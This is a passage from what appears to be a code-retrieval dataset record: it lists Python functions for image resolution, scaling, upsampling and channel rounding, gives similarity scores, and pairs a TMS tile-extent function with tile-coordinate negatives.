downScaleResolution(kv, factor=10):\n sub_img_name = kv[0]\n sub_image = kv[1]\n img_dimension = len(sub_image)\n big_image = sub_image\n Nbig = img_dimension\n Nsmall = Nbig//factor\n small_image = big_image.reshape([Nsmall, Nbig // Nsmall, Nsmall, Nbig // Nsmall]).mean(3).mean(1)\n return (sub_img_name,small_image)", "def _round_filters(self, filters):\n filters *= self.width_coefficient\n new_filters = max(\n self.depth_divisor,\n int(filters + self.depth_divisor / 2)\n // self.depth_divisor\n * self.depth_divisor,\n )\n # Make sure that round down does not go down by more than 10%.\n if new_filters < 0.9 * filters:\n new_filters += self.depth_divisor\n return int(new_filters)", "def _pixel_scale(self, width=None, height=None, scale=None):\n if numpy.count_nonzero([width is not None, height is not None, scale is not None]) > 1:\n raise ValueError(\"Specify only one of width, height, or scale.\")\n if width is not None:\n scale = width / self._width\n elif height is not None:\n scale = height / self._height\n elif scale is None:\n scale = 1.0\n return scale", "def resolution(self) -> int:\n return self.options.resolution", "def pixel_size_ratio(self):\n return 2**(self.levels[-1] - self.levels[0])", "def reduce_resolution(input_dir, output_dir, factor=2):\n # Get the images.\n downsample_ratio = 1.0 / args.factor\n tiles = glob.glob(os.path.join(args.input_dir, 'S_*/*.tif*'))\n tiles.sort()\n print('Number of Tiles: ', len(tiles))\n print('Downsample Ratio: ', downsample_ratio)\n\n # Downsample the images by the requested factor with OpenCV's resize().\n for t in tqdm(tiles):\n dirname = os.path.basename(os.path.dirname(t))\n filename = os.path.basename(t)\n os.makedirs(os.path.join(args.output_dir, dirname), exist_ok=True)\n f_out = os.path.join(args.output_dir, dirname, filename)\n im = cv2.imread(t, 0)\n im_down = cv2.resize(im, (0, 0), fx=downsample_ratio, fy=downsample_ratio)\n cv2.imwrite(f_out, im_down)", "def get_resolution(testdata):\n diffs = np.transpose([testdata[1:, 0], np.diff(testdata[:, 0])])\n resolutions = ud.safedivide(diffs[:, 0], diffs[:, 1])\n # popt, pcov = scipy.optimize.curve_fit(fit_line, diffs[:, 0], resolutions, maxfev=1000000)\n # fitLine = fit_line(diffs[:, 0], *popt)\n # fitMax = np.max(fitLine)\n # fitMin = np.min(fitLine)\n # diffs_new = diffs[(1.2 * fitMin < resolutions) & (resolutions < 1.2 * fitMax)]\n # resolutions_new = resolutions[(1.2 * fitMin < resolutions) & (resolutions < 1.2 * fitMax)]\n # popt2, pcov2 = scipy.optimize.curve_fit(fit_line, diffs_new[:, 0], resolutions_new, maxfev=1000000)\n # plt.figure()\n # plt.plot(diffs[:,0], resolutions)\n # plt.plot(diffs[:, 0], fit_line(diffs[:, 0], *popt2), 'r-')\n # plt.show()\n # Currently use A * m ^1.5 (0.5?)\n # Maybe use a*M^b\n # return popt2\n return np.median(resolutions)", "def scaling(self):\n return self.__scaling", "def _round_channels(channels, multiplier=1.0, divisor=8, channel_min=None):\n if not multiplier:\n return channels\n\n channels *= multiplier\n channel_min = channel_min or divisor\n new_channels = max(\n int(channels + divisor / 2) // divisor * divisor,\n channel_min)\n # Make sure that round down does not go down by more than 10%.\n if new_channels < 0.9 * channels:\n new_channels += divisor\n return new_channels", "def get_res_size_from_size(sz, factor):\n if (factor is None) :\n print('WARNING: Could not compute low_res_size as factor was ' + str( factor ))\n return sz\n else:\n lowResSize = np.array(sz)\n if not isinstance(factor, list):\n lowResSize[2::] = (np.ceil((np.array(sz[2:]) * factor))).astype('int16')\n else:\n lowResSize[2::] = (np.ceil((np.array(sz[2:]) * np.array(factor)))).astype('int16')\n\n if lowResSize[-1]%2!=0:\n lowResSize[-1]-=1\n print('\\n\\nWARNING: forcing last dimension to be even: fix properly in the Fourier transform later!\\n\\n')\n\n return lowResSize", "def upsample_nearest(input, size=None, scale_factor=None):\n return interpolate(input, size, scale_factor, 'nearest')", "def setResolution(self, resolution):\n assert(resolution > 1 and resolution <= 8192)\n self.resolution = resolution", "def scale(self):\n return self.scale_factor / CONSTANTS.AU", "def scaling(self):\n return self._scaling", "def scaling(self):\n return self._scaling", "def resolution(self) -> int:\n return self._resolution", "def upsample(self, method):\n from scipy.signal import resample\n from scipy.ndimage.interpolation import zoom\n #print \"mm: 100 x 100 x 131\"\n #print \"Dims:\", self.D.shape\n fact = np.array(self.info.shape).astype(\"float32\") / np.array(self.info.read_shape).astype(\"float32\")+0.00001 # hrmpf!!\n if method == \"zoom\":\n print \"Resampling...\"\n self.D = zoom(self.D, fact).astype(\"float32\")\n elif method == \"resample\":\n print \"Resampling...\"\n a = self.info.resample_ax\n s = self.info.shape[a]\n self.D = resample(self.D, s, axis=a, window=10).astype(\"float32\")\n elif method == None:\n pass\n else:\n raise NotImplementedError(\"Unknown upsampling method: %s\" % method)\n #print \"Dims:\", self.D.shape\n print \"done.\"", "def set_scale_factors_to_output_size(self):\n # Compute the scale_factor using rounded scaled image size.\n height = tf.shape(self._image)[0]\n width = tf.shape(self._image)[1]\n max_image_size = tf.to_float(tf.maximum(height, width))\n image_scale = tf.to_float(self._output_size) / max_image_size\n scaled_height = tf.to_int32(tf.to_float(height) * image_scale)\n scaled_width = tf.to_int32(tf.to_float(width) * image_scale)\n self._image_scale = image_scale\n self._scaled_height = scaled_height\n self._scaled_width = scaled_width", "def _set_resolution( self ):\r\n offset = 0\r\n # if current and skinned resolutions differ and skinned resolution is not\r\n # 1080i or 720p (they have no 4:3), calculate widescreen offset\r\n if ( ( not ( self.currentResolution == self.resolution ) ) and self.resolution > 1 ):\r\n # check if current resolution is 16x9\r\n if ( self.currentResolution == 0 or self.currentResolution % 2 ): iCur16x9 = 1\r\n else: iCur16x9 = 0\r\n # check if skinned resolution is 16x9\r\n if ( self.resolution % 2 ): i16x9 = 1\r\n else: i16x9 = 0\r\n # calculate widescreen offset\r\n offset = iCur16x9 - i16x9\r\n self.win.setCoordinateResolution( self.resolution + offset )", "def find_supported_scaling_factor(\n current_width: int, current_height: int, target_width: int, target_height: int\n) -> tuple[int, int] | None:\n for idx, supported_sf in enumerate(SUPPORTED_SCALING_FACTORS):\n ratio = supported_sf[0] / supported_sf[1]\n width_after_scale = current_width * ratio\n height_after_scale = current_height * ratio\n if width_after_scale == target_width and height_after_scale == target_height:\n return supported_sf\n if width_after_scale < target_width or height_after_scale < target_height:\n return None if idx == 0 else SUPPORTED_SCALING_FACTORS[idx - 1]\n\n # Giant image, the most we can reduce by is 1/8\n return SUPPORTED_SCALING_FACTORS[-1]", "def calculateRatio(levelDims):\n highestReso = np.asarray(levelDims[0])\n lowestReso = np.asarray(levelDims[-1])\n Xratio, Yratio = highestReso/lowestReso\n return (Xratio, Yratio)", "def set_rscale(self, top, bottom=0, round_up=False):\n if self.shape == 'circle':\n r = top\n elif self.shape == 'polygon':\n angle_of_slice = 2 * np.pi / self.size\n r = top / np.cos(angle_of_slice / 2.)\n if round_up:\n r = np.ceil(r)\n else:\n # this should never happen since this is checked for in class\n # creation\n raise ValueError('unknown value for `frame`: %s' % self.shape)\n self.set_ylim(bottom, r)", "def _get_rupture_dimensions(src, mag, nodal_plane):\n area = src.magnitude_scaling_relationship.get_median_area(\n mag, nodal_plane.rake)\n rup_length = math.sqrt(area * src.rupture_aspect_ratio)\n rup_width = area / rup_length\n seismogenic_layer_width = (src.lower_seismogenic_depth\n - src.upper_seismogenic_depth)\n max_width = (seismogenic_layer_width\n / math.sin(math.radians(nodal_plane.dip)))\n if rup_width > max_width:\n rup_width = max_width\n rup_length = area / rup_width\n return rup_length, rup_width", "def determine_real_to_pixel_ratio(\n image_shape: Tuple[int, int],\n min_x: float,\n min_y: float,\n max_x: float,\n max_y: float,\n):\n image_x = image_shape[1]\n image_y = image_shape[0]\n diff_x = max_x - min_x\n diff_y = max_y - min_y\n\n resolution_x = image_x / diff_x\n resolution_y = image_y / diff_y\n\n # Should be similar as cells are rectangles\n if not np.isclose(resolution_x, resolution_y):\n logging.info(\n f\"Resolution in x and y axes differ: x: {resolution_x} y: {resolution_y}\"\n )\n\n resolution = np.mean([resolution_x, resolution_y])\n\n return resolution", "def _infer_scale(\n print_h: Measurement, print_w: Measurement, viewbox_h: float, viewbox_w: float\n) -> float:\n if any(x < 0 for x in (print_h.value, print_w.value, viewbox_h, viewbox_w)):\n msg = \"Negative values are not allowed\"\n raise ValueError(msg)\n\n candidate_scales: set[float] = set()\n if print_w.value and viewbox_w:\n candidate_scales.add(print_w.value / viewbox_w)\n if print_h.value and viewbox_h:\n candidate_scales.add(print_h.value / viewbox_h)\n if candidate_scales:\n # size of picture is determined by print area\n return min(candidate_scales)\n if any([print_w.value, print_h.value]):\n msg = \"All potential scales would be infinite.\"\n raise ValueError(msg)\n # a print unit was given, but not a print size. Size of picture is determined\n # by interpreting viewbox dimensions as print_width or print_height units\n return print_w.native_unit.value[1]", "def setResolution(self, resolution):\n self._lowLevelSetDeviceResolution(self.ADC_RESOLUTIONS[resolution])", "def calculate_image_scale(source_width, source_height, target_width, target_height):\n if source_width == target_width and source_height == target_height:\n return 1.0\n\n source_ratio = source_width / source_height\n target_ratio = target_width / target_height\n\n if target_ratio < source_ratio:\n scale = target_width / source_width\n else:\n scale = target_height / source_height\n\n return scale", "def get_current_resolution(self):\n return self.display_info[\"width\"], self.display_info[\"height\"]", "def set_resolution(self):\n file_name = os.path.basename(self.in_file)\n if '1KM' in file_name:\n self.resolution = 1000\n else:\n raise ValueError(\n 'Cant read this data, please check its resolution: {}'.format(self.in_file))", "def GetNativeResolution(self, transform=None, maximum=None):\n # Get the source projection's units for a 1x1 pixel, assuming square\n # pixels.\n width, height = self.GetPixelDimensions()\n src_pixel_size = min(abs(width), abs(height))\n\n if transform is None:\n dst_pixel_size = src_pixel_size\n dst_ref = self.GetSpatialReference()\n else:\n # Transform these dimensions into the destination projection\n dst_pixel_size = transform.TransformPoint(src_pixel_size, 0)[0]\n dst_pixel_size = abs(dst_pixel_size)\n dst_ref = transform.dst_ref\n\n # We allow some floating point error between src_pixel_size and\n # dst_pixel_size based on the major circumference so that the error is\n # in the destination units\n error = max(*dst_ref.GetPixelDimensions(resolution=0)) / 128\n\n # Find the resolution where the pixels are smaller than dst_pixel_size.\n for resolution in count():\n if maximum is not None and resolution >= maximum:\n return resolution\n\n res_pixel_size = max(\n *dst_ref.GetPixelDimensions(resolution=resolution)\n )\n if (res_pixel_size - dst_pixel_size) <= error:\n return resolution\n\n # Halve error each resolution\n error /= 2", "def get_resolution(self, curvename):\n\n if curvename == 'flank':\n return self.points_flank\n elif curvename == 'fillet':\n return self.points_fillet\n elif curvename == 'tip':\n return self.points_tip\n elif curvename == 'root':\n return self.points_root\n elif curvename == 'shaft':\n return self.points_shaft\n elif curvename == 'width':\n return self.points_width", "def upsample(\n input,\n size=None,\n scale_factor=None,\n mode='nearest',\n align_corners=False,\n):\n return interpolate(input, size, scale_factor, mode, align_corners)", "def span_rbw_ratio(self):\r\n res = self._visa.query(f\"SENSE{self._screen()}:BANDWIDTH:RESOLUTION:RATIO?\")\r\n return 1 / float(res)", "def ratio(self):\n return float(self.max_width) / self.max_height", "def stdsize(image,r=30):\n image = square(image)\n s,_ = image.shape\n return interpolation.zoom(image,(r+0.5)/float(s))", "def _scale_filters(filters, multiplier, base=8):\n round_half_up = int(int(filters) * multiplier / base + 0.5)\n result = int(round_half_up * base)\n return max(result, base)", "def handle_proportionality_factors(self, scaling_candidates):\n\n if not len(scaling_candidates):\n return\n\n scalingsForHierarchicalIndices = [\n self.optimization_parameter_name_to_index[x] for x in\n scaling_candidates]\n order = np.argsort(scalingsForHierarchicalIndices)\n scalingsForHierarchicalIndices = \\\n [scalingsForHierarchicalIndices[i] for i in order]\n scaling_candidates = [scaling_candidates[i] for i in order]\n\n\n self.f.require_dataset(\"/scalingParameterIndices\",\n shape=(len(scalingsForHierarchicalIndices),),\n dtype='<i4',\n data=scalingsForHierarchicalIndices)\n print(Fore.CYAN, \"Number of proportionality factors for \"\n \"hierarchical optimization: %d\"\n % len(scalingsForHierarchicalIndices))\n\n # find usages for the selected parameters\n use = self.get_analytical_parameter_table(scaling_candidates,\n 'observable')\n\n self.f.require_dataset(\"/scalingParametersMapToObservables\",\n shape=(len(use), 3),\n dtype='<i4', data=use)", "def scale(self, factors):\n if isinstance(factors, numbers.Number):\n factors = np.ones(self.dim) * factors;\n self.raw_wires.scale(factors);", "def guess_scaling(name, spectrum):\n spectra = '%s/disp/%s.1d.fits' % (name, zerocount(spectrum))\n skyname = '%s/sky.1d.fits' % name\n spectrafits = pyfits.open(spectra)\n skyfits = pyfits.open(skyname)\n scalings = []\n for line in LINES:\n spec_peak, spec_cont = get_peak_cont(spectrafits, line, 5)\n sky_peak, sky_cont = get_peak_cont(skyfits, line, 5)\n scale = ((spec_peak - spec_cont) / (sky_peak - sky_cont))\n scalings.append(scale)\n return avg(*scalings)", "def process(self, resolutions):\r\n # This is optional behavior\r\n return resolutions", "def round_filters(filters, divisor=depth_divisor):\n filters *= width_coefficient\n new_filters = max(divisor, int(filters + divisor / 2) // divisor * divisor)\n # Make sure that round down does not go down by more than 10%.\n if new_filters < 0.9 * filters:\n new_filters += divisor\n return int(new_filters)", "def __call__(self, results):\n if 'scale' not in results:\n if 'scale_factor' in results:\n img_shape = results['img'].shape[:2]\n scale_factor = results['scale_factor']\n assert isinstance(scale_factor, float)\n results['scale'] = tuple([int(x * scale_factor) for x in img_shape][::-1])\n else:\n self._random_scale(results)\n else:\n if not self.override:\n assert 'scale_factor' not in results, 'scale and scale_factor cannot be both set.'\n else:\n results.pop('scale')\n if 'scale_factor' in results:\n results.pop('scale_factor')\n self._random_scale(results)\n\n self._resize_img(results)\n self._resize_bboxes(results)\n self._resize_cbboxes(results)\n self._resize_masks(results)\n self._resize_seg(results)\n\n return results", "def scanResolution(self):\n return self._getAttribute(Attribute.scanResolution)", "def change_resolution(self):", "def castSize(self, scale):\n return self.camera.sensorSize * scale", "def getResolution(s) -> int:\n unit = getDurationUnit(s)\n #number of ticks is 1 / unit (if that is an integer)\n ticksPerQuarter = unit.denominator / unit.numerator\n if ticksPerQuarter.is_integer():\n return int(unit.denominator / unit.numerator)\n else:\n print(s.filePath, ' non integer number of ticks per Quarter')\n return 0", "def __call__(self, results):\n\n if 'scale' not in results:\n if 'scale_factor' in results:\n img_shape = results['img'].shape[:2]\n scale_factor = results['scale_factor']\n assert isinstance(scale_factor, float)\n results['scale'] = tuple(\n [int(x * scale_factor) for x in img_shape][::-1])\n else:\n self._random_scale(results)\n else:\n if not self.override:\n assert 'scale_factor' not in results, (\n 'scale and scale_factor cannot be both set.')\n else:\n results.pop('scale')\n if 'scale_factor' in results:\n results.pop('scale_factor')\n self._random_scale(results)\n\n self._resize_img(results)\n self._resize_bboxes(results)\n self._resize_masks(results)\n self._resize_seg(results)\n return results", "def __call__(self, results):\n\n if 'scale' not in results:\n if 'scale_factor' in results:\n img_shape = results['img'].shape[:2]\n scale_factor = results['scale_factor']\n assert isinstance(scale_factor, float)\n results['scale'] = tuple(\n [int(x * scale_factor) for x in img_shape][::-1])\n else:\n self._random_scale(results)\n else:\n if not self.override:\n assert 'scale_factor' not in results, (\n 'scale and scale_factor cannot be both set.')\n else:\n results.pop('scale')\n if 'scale_factor' in results:\n results.pop('scale_factor')\n self._random_scale(results)\n\n self._resize_img(results)\n self._resize_bboxes(results)\n self._resize_masks(results)\n self._resize_seg(results)\n return results", "def Resolution(self):\n\t\treturn self._get_attribute('resolution')", "def upsampling(\n data,\n scale_h,\n scale_w,\n layout=\"NCHW\",\n method=\"nearest_neighbor\",\n align_corners=False,\n output_shape=None,\n):\n base_layout = layout[0:4]\n if base_layout == \"NCHW\":\n if not output_shape: # static case\n scaled_h = data.shape[2] * scale_h\n scaled_w = data.shape[3] * scale_w\n reshape_size = (\n simplify(topi.cast(te.round(scaled_h), data.shape[2].dtype)),\n simplify(topi.cast(te.round(scaled_w), data.shape[3].dtype)),\n )\n else: # dynamic case -- we don't need to scale; already done in shape func\n reshape_size = (\n simplify(topi.cast(te.round(output_shape[2]), output_shape[2].dtype)),\n simplify(topi.cast(te.round(output_shape[3]), output_shape[3].dtype)),\n )\n elif layout == \"NHWC\":\n if not output_shape: # static case\n scaled_h = data.shape[1] * scale_h\n scaled_w = data.shape[2] * scale_w\n reshape_size = (\n simplify(topi.cast(te.round(scaled_h), data.shape[1].dtype)),\n simplify(topi.cast(te.round(scaled_w), data.shape[2].dtype)),\n )\n else: # dynamic case\n reshape_size = (\n simplify(topi.cast(te.round(output_shape[1]), output_shape[1].dtype)),\n simplify(topi.cast(te.round(output_shape[2]), output_shape[2].dtype)),\n )\n\n else:\n raise ValueError(f\"not support this layout {layout} yet\")\n coord_trans = \"align_corners\" if align_corners else \"asymmetric\"\n if method[0:2] == \"bi\":\n method = method[2:]\n return topi.image.resize2d(\n data,\n [0.0] * 4,\n reshape_size,\n layout=layout,\n method=method,\n coordinate_transformation_mode=coord_trans,\n output_shape=output_shape,\n )", "def get_scale_factor(rec, stack):\n \n rec_pixel_size = get_pixel_size_rec(rec)\n stack_pixel_size = get_pixel_size_stack(stack)\n \n return rec_pixel_size / stack_pixel_size", "def determine_thresholds(confidence, resolution=100):\n if isinstance(confidence, list):\n confidence = np.array(confidence)\n confidence = confidence.flatten()\n confidence = confidence[~np.isnan(confidence)]\n confidence.sort()\n\n assert len(confidence) > resolution and resolution > 2\n\n thresholds = np.ones((resolution))\n thresholds[0] = - np.inf\n thresholds[-1] = np.inf\n delta = np.floor(len(confidence) / (resolution - 2))\n idxs = np.linspace(delta, len(confidence)-delta, resolution-2, dtype=np.int32)\n thresholds[1:-1] = confidence[idxs]\n return thresholds", "def rscale(mag=10.0):\n if mag > 11.5:\n return 0.5\n elif mag > 11.0:\n return 1.0\n elif mag > 10.5:\n return 1.5\n elif mag > 10.0:\n return 1.5\n elif mag > 9.5:\n return 2.0\n elif mag > 9.0:\n return 2.5\n elif mag > 8.5:\n return 3.0\n else:\n return 3.5", "def _round_sampling_rate(sampling_rate):\n # check if sampling rate is below 5 Hz in that case always round to one\n if sampling_rate < 5:\n\n # set sampling rate to 1\n rounded_sampling_rate = 1\n\n else:\n\n # round to the nearest 10 digit\n rounded_sampling_rate = round(sampling_rate/10) * 10\n\n return rounded_sampling_rate", "def calculate_rf_size(rf_size, downsample):\n h = 61 # 24\" monitor\n d = 10 # 10cm from the right eye\n r = 1080 / downsample # Vertical resolution\n d_px = np.degrees(math.atan2(h / 2, d)) / (r / 2)\n return rf_size * d_px", "def scaling_factor(self):\n bin_scale = self.spabins * self.spebins\n return bin_scale * self.int_time", "def zoom_to_size(self, *p):\n\t\tif self.image is None or self.allocation is None:\n\t\t\treturn\n\t\tif __debug__: print self.allocation.width, self.image.get_width()\n\t\tif __debug__: print self.allocation.width, self.image.get_width(), self.allocation.width/self.image.get_width()\n\t\tz = min(\n\t\t\tself.allocation.width/self.image.get_width(),\n\t\t\tself.allocation.height/self.image.get_height()\n\t\t\t)\n\t\tif __debug__: print \"zoom_to_size\", \"z=\", z\n\t\tself.zoom = z", "def upround(x, base):\n return base * math.ceil(float(x) / base)", "def get_resolution(self):\n return self.__resolution", "def _round_filters(self, filters, width_coefficient, depth_divisor, min_depth):\n\n if not width_coefficient:\n return filters\n\n filters *= width_coefficient\n min_depth = min_depth or depth_divisor\n new_filters = max(\n min_depth,\n int(filters + depth_divisor / 2) // depth_divisor*depth_divisor\n )\n # Make sure that round down does not go down by more than 10%.\n if new_filters < 0.9 * filters:\n new_filters += depth_divisor\n\n return int(new_filters)", "def get_apply_scale(self, applyScaleFactor, scale_quality = 1.0):\n v = self.scale * self.scale_quality * scale_quality\n if applyScaleFactor:\n v *= self.scale_factor\n return v", "def resize(orig, factor, method=\"nearest\"):\r\n method_dict = {'nearest': 0, 'bilinear': 1, 'cubic': 2}\r\n if method.lower() not in method_dict:\r\n raise ValueError(\"Invalid interpolation method. Options are: \" + \", \".join(method_dict.keys()))\r\n try:\r\n return zoom(orig, factor, order=method_dict[method.lower()])\r\n except RuntimeError:\r\n # raised by zoom when factor length does not match orig.shape length\r\n raise ValueError(\"Factor sequence length does not match input length\")", "def Rescale(self):\r\n picWidth,picHeight = self.oldSize = self.GetSizeTuple()\r\n bitmap = self.scaled = self.bitmap\r\n if not bitmap: return\r\n imgWidth,imgHeight = bitmap.GetWidth(),bitmap.GetHeight()\r\n if self.scaling == 2 or (self.scaling == 1 and (imgWidth > picWidth or imgHeight > picHeight)):\r\n image = bitmap.ConvertToImage()\r\n factor = min(1.0*picWidth/imgWidth,1.0*picHeight/imgHeight)\r\n newWidth,newHeight = int(factor*imgWidth),int(factor*imgHeight)\r\n self.scaled = image.Scale(newWidth,newHeight).ConvertToBitmap()\r\n #self.scaled = image.Scale(newWidth,newHeight,wx.IMAGE_QUALITY_HIGH ).ConvertToBitmap()\r", "def resolution_init():\n\n defaultResolution = pm.PyNode(\"defaultResolution\")\n task = ftrack.Task(os.environ[\"FTRACK_TASKID\"])\n\n # Adding/Checking ftrack resolution attribute\n resolution_set = False\n if hasattr(defaultResolution, \"ftrackResolutionSet\"):\n attr = pm.Attribute(\"defaultResolution.ftrackResolutionSet\")\n resolution_set = attr.get()\n else:\n pm.addAttr(\n defaultResolution,\n longName=\"ftrackResolutionSet\",\n defaultValue=True,\n attributeType=\"bool\"\n )\n\n if not resolution_set:\n width = task.getParent().get(\"width\")\n defaultResolution.width.set(width)\n pm.warning(\"Changed resolution width to: {0}\".format(width))\n height = task.getParent().get(\"height\")\n defaultResolution.height.set(height)\n pm.warning(\"Changed resolution height to: {0}\".format(height))\n\n # Vray specific resolution\n if pm.objExists(\"vraySettings\"):\n vray_settings = pm.PyNode(\"vraySettings\")\n vray_settings.width.set(width)\n pm.warning(\"Changed vray resolution width to: {0}\".format(width))\n vray_settings.height.set(height)\n pm.warning(\"Changed vray resolution height to: {0}\".format(height))", "def resolution(self):\n return {'x': self.width, 'y': self.height}", "def largestResolution(resolutions):\n return resolutions[0]", "def _upsample_conv(self, x, conv):\n return conv(\n F.interpolate(x,\n scale_factor=2,\n mode='bilinear',\n align_corners=False))", "def _apply_resolution(self, Qin, Rin, interpolation):\n Q, dQ = _interpolate_Q(self.Q, self.dQ, interpolation)\n if np.iscomplex(Rin).any():\n R_real = convolve(Qin, Rin.real, Q, dQ, resolution=self.resolution)\n R_imag = convolve(Qin, Rin.imag, Q, dQ, resolution=self.resolution)\n R = R_real + 1j*R_imag\n else:\n R = convolve(Qin, Rin, Q, dQ, resolution=self.resolution)\n return Q, R", "def get_scaling_ratio(img):\n\n healthy_img_area = 4872 * 6496\n input_img_area = img.shape[0] * img.shape[1]\n ratio = input_img_area / healthy_img_area\n return ratio", "def _set_pixel_size(self) -> None:\n # Not Pansharpened images\n if self.band_combi == Sv1BandCombination.PMS:\n # TODO: manage default resolution for PAN band ?\n self.pixel_size = self._ms_res\n # Pansharpened images\n else:\n self.pixel_size = self._pan_res", "def find_suggested_tonemap_scale(session):\n avg_film_luminance = session.GetFilm().GetFilmY()\n return (1.25 / avg_film_luminance * (118 / 255))\n\n # TODO\n # measure this all the time, show a message to the user if\n # abs(old - new) > threshold\n # so the user can set the new value with one click\n\n # imagepipeline = scene.camera.data.luxcore.imagepipeline\n # imagepipeline.tonemapper.linear_scale = suggested_linear_scale\n # imagepipeline.tonemapper.use_autolinear = False", "def __init__(self, resolution, normalize=True, eps=1e-6):\n super().__init__()\n self.r = int(resolution)\n self.normalize = normalize\n self.eps = eps", "def Resolution(self, *args):\n return _Adaptor3d.Adaptor3d_Curve_Resolution(self, *args)", "def _get_upsample_layer(self, in_channels=None, out_channels=None):\n if self.expand_strategy == \"upsample\":\n return nn.Upsample(scale_factor=2, mode=\"nearest\")\n elif self.expand_strategy == \"transpose_convolution\":\n return nn.ConvTranspose2d(\n in_channels, out_channels, 3, stride=2, padding=1, output_padding=1\n )\n else:\n raise ValueError(\"Unkown expand strategy\")", "def _calc_fig_size(self, image_height, dpi, y_range, slice_window, fs):\n duration = slice_window / fs\n width_mm = duration * self.MM_IN_SEC\n height_mm = abs(y_range.max - y_range.min) * self.MM_IN_MV\n\n height_inch = image_height / dpi\n width_inch = height_inch * width_mm / height_mm\n\n return (width_inch, height_inch)", "def standardizeRatios( self, ratios ):\n\t\tratios_standardized = ratios.copy()\n\t\tzscore = lambda x: ( x - x.mean() ) / x.std()\n\t\tfor row in ratios.iterrows():\n\t\t\tratios_standardized.loc[ row[0] ] = zscore( row[1] )\n\t\treturn ratios_standardized", "def _scale_param(self, resid_us):\n return((resid_us**2).sum().sum() / self.dof)", "def resolution(self):\n return self._resolution", "def resolution(self, resolution):\n\n self._resolution = resolution", "def get_scaling(self):\n if self.constrain_navigation:\n self.activate_navigation_constrain()\n return self.sx, self.sy", "def resolution(self):\n return next(iter(self.resolutions()), None)", "def testCalculateVNCScreenRatio(self, mock_tk):\n # Get scale-down ratio if screen height is smaller than AVD height.\n mock_tk.return_value = FakeTkinter(height=800, width=1200)\n avd_h = 1920\n avd_w = 1080\n self.assertEqual(utils.CalculateVNCScreenRatio(avd_w, avd_h), 0.4)\n\n # Get scale-down ratio if screen width is smaller than AVD width.\n mock_tk.return_value = FakeTkinter(height=800, width=1200)\n avd_h = 900\n avd_w = 1920\n self.assertEqual(utils.CalculateVNCScreenRatio(avd_w, avd_h), 0.6)\n\n # Scale ratio = 1 if screen is larger than AVD.\n mock_tk.return_value = FakeTkinter(height=1080, width=1920)\n avd_h = 800\n avd_w = 1280\n self.assertEqual(utils.CalculateVNCScreenRatio(avd_w, avd_h), 1)\n\n # Get the scale if ratio of width is smaller than the\n # ratio of height.\n mock_tk.return_value = FakeTkinter(height=1200, width=800)\n avd_h = 1920\n avd_w = 1080\n self.assertEqual(utils.CalculateVNCScreenRatio(avd_w, avd_h), 0.6)" ]
[ "0.66777146", "0.5513569", "0.5297719", "0.5258411", "0.51001024", "0.50386363", "0.50341105", "0.50095075", "0.49838406", "0.49593174", "0.48953298", "0.48382708", "0.47824258", "0.4761503", "0.47418657", "0.47418657", "0.47418657", "0.47353554", "0.46934766", "0.46716377", "0.46686354", "0.46632555", "0.464116", "0.46300888", "0.46214852", "0.4617522", "0.46121708", "0.46090895", "0.46079633", "0.459634", "0.4591744", "0.4590737", "0.4590737", "0.4582168", "0.45549777", "0.45530677", "0.45529407", "0.45406085", "0.45286712", "0.45277342", "0.45252836", "0.45016167", "0.45015433", "0.4496983", "0.44873065", "0.4483391", "0.44797924", "0.44791883", "0.4477756", "0.4472525", "0.44724697", "0.44563133", "0.4442905", "0.44342223", "0.44298378", "0.4428681", "0.44277474", "0.44252795", "0.4424534", "0.4420016", "0.44192308", "0.44094476", "0.44036007", "0.44033262", "0.44022742", "0.44022742", "0.43882185", "0.43877232", "0.43824604", "0.4374804", "0.43692845", "0.4360759", "0.43569183", "0.43535465", "0.43473327", "0.43412396", "0.43398592", "0.43371242", "0.43241242", "0.43237358", "0.4322482", "0.43220592", "0.4320956", "0.43131113", "0.43064624", "0.43046552", "0.43039057", "0.4301367", "0.42983094", "0.42953598", "0.42902893", "0.42818382", "0.4281588", "0.42791483", "0.42697376", "0.42689234", "0.4251579", "0.4250367", "0.42499098", "0.42486098" ]
0.7302088
0
Returns (lowerleft, upperright) TMS tile coordinates. The upperright coordinates are excluded from the range, while the lowerleft are included.
def GetTmsExtents(self, resolution=None, transform=None): if resolution is None: resolution = self.GetNativeResolution(transform=transform) # Get the tile dimensions in map units if transform is None: spatial_ref = self.GetSpatialReference() else: spatial_ref = transform.dst_ref tile_width, tile_height = spatial_ref.GetTileDimensions( resolution=resolution ) # Validate that the native resolution extents are tile-aligned. extents = self.GetTiledExtents(transform=transform) pixel_sizes = spatial_ref.GetPixelDimensions(resolution=resolution) if not extents.almost_equal(self.GetExtents(transform=transform), delta=min(*pixel_sizes)): raise UnalignedInputError('Dataset is not aligned to TMS grid') # Correct for origin, because you can't do modular arithmetic on # half-tiles. left, bottom = spatial_ref.OffsetPoint(*extents.lower_left) right, top = spatial_ref.OffsetPoint(*extents.upper_right) # Divide by number of tiles return Extents(lower_left=XY(int(round(left / tile_width)), int(round(bottom / tile_height))), upper_right=XY(int(round(right / tile_width)), int(round(top / tile_height))))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getupperleft(self):\n return (self.rect.x, self.rect.y)", "def topLeftCorner(self):\n self._updateExtents()\n return (self._mMinX,self._mMinY)", "def topRightCorner(self):\n self._updateExtents()\n return (self._mMaxX,self._mMinY)", "def get_tile_location(self):\n if self.rect.x == 0:\n tile_x = 0\n elif self.rect.x % 32 == 0:\n tile_x = (self.rect.x / 32)\n else:\n tile_x = 0\n\n if self.rect.y == 0:\n tile_y = 0\n elif self.rect.y % 32 == 0:\n tile_y = (self.rect.y / 32)\n else:\n tile_y = 0\n\n return [tile_x, tile_y]", "def tile_coordinates(text):\n UL = (text[1]), (text[2]) # Upper Left\n UR = (text[3]), (text[2]) # Upper Right\n LR = (text[3]), (text[4]) # Lower Right\n LL = (text[1]), (text[4]) # Lower Left\n coordinates = (UL, UR, LR, LL)\n return text[0], [tuple(float(x) for x in xs) for xs in coordinates]", "def topleft(self):\n return (self.left, self.top)", "def upper_left(self) -> Tuple[decimal.Decimal, decimal.Decimal]:\n return self.left, self.top", "def __getMaxUpperLeftCoordinate(self, entityNodeList):\r\n minX = sys.maxint\r\n minY = sys.maxint\r\n for node in entityNodeList:\r\n if(node.graphObject_.y < minY):\r\n minY = node.graphObject_.y\r\n if(node.graphObject_.x < minX):\r\n minX = node.graphObject_.x \r\n return (minX, minY)", "def get_current_edges(self) -> Tuple[int, int, int, int]:\n top = int(self.tile_rows[0], 2)\n bottom = int(self.tile_rows[-1], 2)\n left = int(''.join([r[0] for r in self.tile_rows]), 2)\n right = int(''.join([r[-1] for r in self.tile_rows]), 